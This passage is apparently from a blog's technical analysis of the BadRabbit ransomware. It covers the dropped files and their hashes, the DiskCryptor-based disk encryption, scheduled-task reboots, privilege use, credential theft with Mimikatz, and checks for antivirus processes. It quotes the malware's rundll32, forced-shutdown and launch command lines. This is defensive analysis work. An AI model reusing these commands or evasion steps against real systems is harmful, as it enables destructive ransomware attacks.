<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="180" src="https://lh4.googleusercontent.com/7gY7LhrLH3-NgRfaNj5OZxydpXG7zYU2KWVZRS_j8y2BEGxvuZdze8CFQqAi80_OHB-azvVgBXcaUw-Ghj4gncez2vmQbMxR-1jqykB-mqeQ1E6DyOE1_xnWjIBWw3SuZI-eAgWT" style="border: none; transform: rotate(0rad);" width="419" /></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The dropper has a valid certificate from Symantec but the wrong signature.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="515" src="https://lh5.googleusercontent.com/rE5bSdQW_z5rXQFvB3EGAJB04TX6eF4xfmJpvwCoq0iJwfwY4j2hzim-gDY2V3ACJIO4X1zNeqE8DrYv7TwAmaBe3TPu7WQFAhkvAyrHcz2MBAom6W_m3eLQYR-IUD0cs00bsT-f" style="border: none; transform: rotate(0rad);" width="405" /></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="378" src="https://lh4.googleusercontent.com/4HrctM7DhxEIL2-q9_u0vkPSxHT_EMG0DcmsND_WjvvOho0Iof4qwHh_eOj08ZzdU-EWwIKSLieX0kPU-R2Ts_Xh3b-yAkwPv9eqUbkH6tLU9fUxkbENZXhVSPBa_SJ7wG8v0k9C" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="217" /></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The following files are dropped:</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<ul style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">cscc.dat</span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> (32-bit MD5: edb72f4a46c39452d1a5414f7d26454a, 64-bit MD5: B4E6D97DAFD9224ED9A547D52C26CE02) - the legitimate DiskCryptor driver used for the disk encryption (</span><a href="http://diskcryptor.net/" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">diskcryptor.net</span></a><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">) by the manager dispci.exe. It is installed as a service named cscc’</span></div>
</li>
</ul>
<b style="font-weight: normal;"><br /></b>
<br />
<ul style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">dispci.exe</span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> (MD5: b14d8faf7f0cbcfad051cefe5f39645f) - communicates with the DiskCryptor driver cscc.dat (a.k.a. </span><span style="background-color: white; color: #232627; font-family: "arial"; font-size: 10.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">dcrypt.sys</span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">) by sending the </span><span style="background-color: white; color: #0c0c17; font-family: "arial"; font-size: 12pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">DeviceIOControl Control </span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">codes to infect MBR and encrypt disk volumes. For example:</span></div>
</li>
</ul>
<blockquote class="tr_bq" style="line-height: 1.38; margin-bottom: 0pt; margin-left: 72pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">IOCTL_DISK_GET_PARTITION_INFO_EX</span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">IOCTL_DISK_GET_PARTITION_INFO</span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">IOCTL_DISK_GET_LENGTH_INFO</span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">IOCTL_STORAGE_GET_DEVICE_NUMBER</span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">IOCTL_VOLUME_GET_VOLUME_DISK_EXTENTS</span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">DC_CTL_LOCK_MEM</span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">DC_CTL_ENCRYPT_START</span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">DC_CTL_UNLOCK_MEM</span></blockquote>
<b style="font-weight: normal;"><br /></b>
<br />
<ul style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: white; color: #414042; font-family: Arial; font-size: 12pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Infpub.dat</span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> (MD5: 1d724f95c61f1055f0d02c2154bbccd3) - the DLL is responsible for file encryption and network propagation (the code based on the NotPetya’s ‘perfc.dat’ payload)</span></div>
</li>
</ul>
<b style="font-weight: normal;"><br /></b>
<br />
<ul style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Mimikatz </span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">(32 bit MD5: 37945c44a897aa42a66adcab68f560e0, 64 bit MD5: 347AC3B6B791054DE3E5720A7144A977) - is dropped as a .tmp file in the Windows folder and used to harvest logins and passwords through the named pipe to BadRabbit similar to NotPetya. Mimikatz is sent the name of the pipe as a parameter:</span></div>
</li>
</ul>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">C:\Windows\<RND>.tmp \\.\pipe\{GUID}</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The BadRabbit will not start if the ‘cscc.dat’ file is in the Windows folder.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Tо start encrypting files, the dropper loads the dropped dll in the similar way as NotPetya was executed by the MEDoc backdoor (“C:\Windows\system32\rundll32.exe C:\Windows\perfc.dat,#1 30”):</span></div>
<blockquote class="tr_bq" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><i>“C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15”</i></span></blockquote>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="104" src="https://lh6.googleusercontent.com/MUOFSOMKxTBueMiisQblmv4sLQYtepRfXizUvibm3GH0fuq6TVwwuFXQUzG9ta3DYR6WLQlOIBTJxyX9VHkyDRJKIeZ6M_G7Is010mUQRRIMG_TRyc_oWZNO2_SGDVW7IFPDEddb" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="602" /></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<h2 dir="ltr" style="line-height: 1.38; margin-bottom: 6pt; margin-top: 18pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 16pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Scheduling tasks</span></h2>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">BadRabbit schedule a system reboot in several minutes. </span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="199" src="https://lh4.googleusercontent.com/Pc6ShOgB78jARQuKP6eHmGYB6EEooid5kILp00okdDwB3tTTEi7peT2jdZo7S5Cls3LjBV44kE73Y1iLGajLSo1gbWOhoOQFB986vczpFOGdBJhlF7_qGGyZVGZPIINr69krADnh" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="602" /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">C:\WINDOWS\system32\shutdown.exe /r /t 0 /f</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">On reboot, it starts the payload in the console under the ‘SYSTEM’ account as follows:</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">“C:\Windows\dispci.exe” -id 3110397262 && exit </span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="199" src="https://lh3.googleusercontent.com/dlc7Mz7dieXuehqIP8dda27oqlGmIaHfBS_GwbLA0ZF61bdr3MvlOG-8efdtfxAljftXjRyxfSeSJTsszDW7NRZ6MyPrDeNhYJkfD7I5qJABx4-BZRwZXZouqGNrQXZJjNPqKl20" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="602" /></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">C:\WINDOWS\system32\cmd.exe /C Start "" "C:\Windows\dispci.exe" -id 3288954816 && exit</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">If the task with the same name exists, BadRabbit deletes it.Then creates a new one.</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="212" src="https://lh5.googleusercontent.com/e4o5dee3i4C2yrKukJt1ftXEGi2VS0D7QIWdxcH6EUXQ60CLOiaVBRVOwjdmuFMNuD13ttkhT-dAacu2Ufx6pe76cYLDgHQw_EWlmwIKlnGwjUNlEAjf4GmCR-4MBt7SyeI63SE_" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="602" /></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Bootloader</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The manager</span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> dispci.exe</span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> contains MBR and two versions of kernels (kernel 1 - 21162 and kernel 2 - 16718 bytes) as resources.</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="207" src="https://lh4.googleusercontent.com/3TrEFkhmXkwv7jlnebPzqgxAWimuQIdim5Zm13_ZGlH-3BCbAvIHpD3seaoA-IDECDAk1ls3D9egsIJgRxsXSc2kDoCG5kfllL_d3IHK0ZtYKZspP9u31ZXCPtjuev2fxBHBjJQB" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="602" /></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">On the right, the deployed kernel already has the generated installation key#1:</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="248" src="https://lh3.googleusercontent.com/AMicEqPodMg6yln2djPOVCL32lNaIhy4beIYDsfDbT0MAosU9exDJS6O6uFmIJmEfA-z2rIUYhQKPgHsnkLdFfR8UEOSSw9lnC6p0eKHVAjIKQTrkc4YnPuN8dfTqADaFa00pZih" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="602" /></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Analysis of infpub.dat</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Infpub.dat is a </span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">dll with exported functions. BadRabbit starts the first exported function. The second one is designed to run the first one, providing the input parameter as the BadRabbit dropper does.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="79" src="https://lh6.googleusercontent.com/e_6lHeHN95b-o-Z8FPnj3t7-oGtof_w5kOcn2GjB9WKU4OXU70514B0X4h7C-bxGCLL7MOoVJVOG2sKtsRgc1KN4rIOysPa0VEkcHfftq3OFIBjJFJz0TMHYy0QR89bIDtpNK_CE" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="462" /></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The process gets the following privileges: </span></div>
<ul style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">SeShutdownPrivilege </span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">- allows an attacker to shut down the local computer.</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">SeDebugPrivilege</span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> - allows an attacker to access and modify the target process memory.</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">SeTcbPrivileges</span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> - allows a process to authenticate like a user and thus gain access to the same resources as a user. </span></div>
</li>
</ul>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="535" src="https://lh5.googleusercontent.com/9GJLLExrsnh-BDDsz6uc_Fo1zkYswlioCDOBUBIG5JEBEAZkUNhTSyESkuFyYtFCHDhne7Gvm4-oXo8q9u0TD0CbI4tuj-cPpubzyepKzGIo08oajtPWbZ22v3rpjtQfh-57r1uy" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="528" /></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The Bad Rabbit ransomware checks for the following running processes of DrWeb and MacAfee:</span></div>
<ul style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="list-style-type: disc; vertical-align: baseline;"><span style="font-family: "arial";"><span style="font-size: 14.6667px;">dwwatcher.exe</span></span></li>
<li dir="ltr" style="list-style-type: disc; vertical-align: baseline;"><span style="font-family: "arial";"><span style="font-size: 14.6667px;">McTray.exe</span></span></li>
<li dir="ltr" style="list-style-type: disc; vertical-align: baseline;"><span style="font-family: "arial";"><span style="font-size: 14.6667px;">dwarkdaemon.exe</span></span></li>
<li dir="ltr" style="list-style-type: disc; vertical-align: baseline;"><span style="font-family: "arial";"><span style="font-size: 14.6667px;">dwservice.exe</span></span></li>
<li dir="ltr" style="list-style-type: disc; vertical-align: baseline;"><span style="font-family: "arial";"><span style="font-size: 14.6667px;">mfevtps.exe</span></span></li>
<li dir="ltr" style="list-style-type: disc; vertical-align: baseline;"><span style="font-family: "arial";"><span style="font-size: 14.6667px;">dwengine.exe</span></span></li>
<li dir="ltr" style="list-style-type: disc; vertical-align: baseline;"><span style="font-family: "arial";"><span style="font-size: 14.6667px;">mcshield.exe</span></span></li>
</ul>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh89PanAs8E5DaZUXV8S_eCtoI0crp-tyxgINVkhW5mn9ouEARNKpHhdi6vuuYhrequCYBsqNpMbhSOJOTisXX1UUDwy8qqHCXcijxwXGo2eTa2zaWFeGpiKlNKBzsNwhrv01d5GtLh5VB5/s1600/BadRabbit_process_blacklist.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="271" data-original-width="585" height="296" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh89PanAs8E5DaZUXV8S_eCtoI0crp-tyxgINVkhW5mn9ouEARNKpHhdi6vuuYhrequCYBsqNpMbhSOJOTisXX1UUDwy8qqHCXcijxwXGo2eTa2zaWFeGpiKlNKBzsNwhrv01d5GtLh5VB5/s640/BadRabbit_process_blacklist.png" width="640" /></a></div>
<div>
<br /></div>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">To do that, it calculates the hash using XOR and decrement operations in the similar way that NotPetya did.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="470" src="https://lh3.googleusercontent.com/GBRidhae-njF_UZd2h4DrCKMCnmdz18D0tqQB-904_UVWJOV3ozJFbdEjPYK3iFze7oqLXnMznv7BTIKszfvzqlneITPEl6g2GhQv3tmkGhDE2qmCr_dtNEmSzMEOS22KeCa1u6P" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="446" /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The difference is in the XOR key. The Bad Rabbit has “87654321h” while NotPetya - “12345678h”.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Once the BadRabbit detects McAffee or DrWeb processes, it drops </span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">cscc.dat</span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> in %ALLUSERSPROFILE% folder and does not encrypt files. Otherwise, cscc.dat is dropped to the Windows folder.</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="243" src="https://lh4.googleusercontent.com/PXJHNWoenj2MgQUgx7x3iwLpX49BZ_0CZbQp-aT9gS6smHRy-Dh2s7zdsWmqpI9JC6m_B3EY9xCV9q2Jzta3KoismfrYGYfWeedoVJEYl9F0qdLrwd0WRIBg8Ldxmz4XZsmqYmOj" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="566" /></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
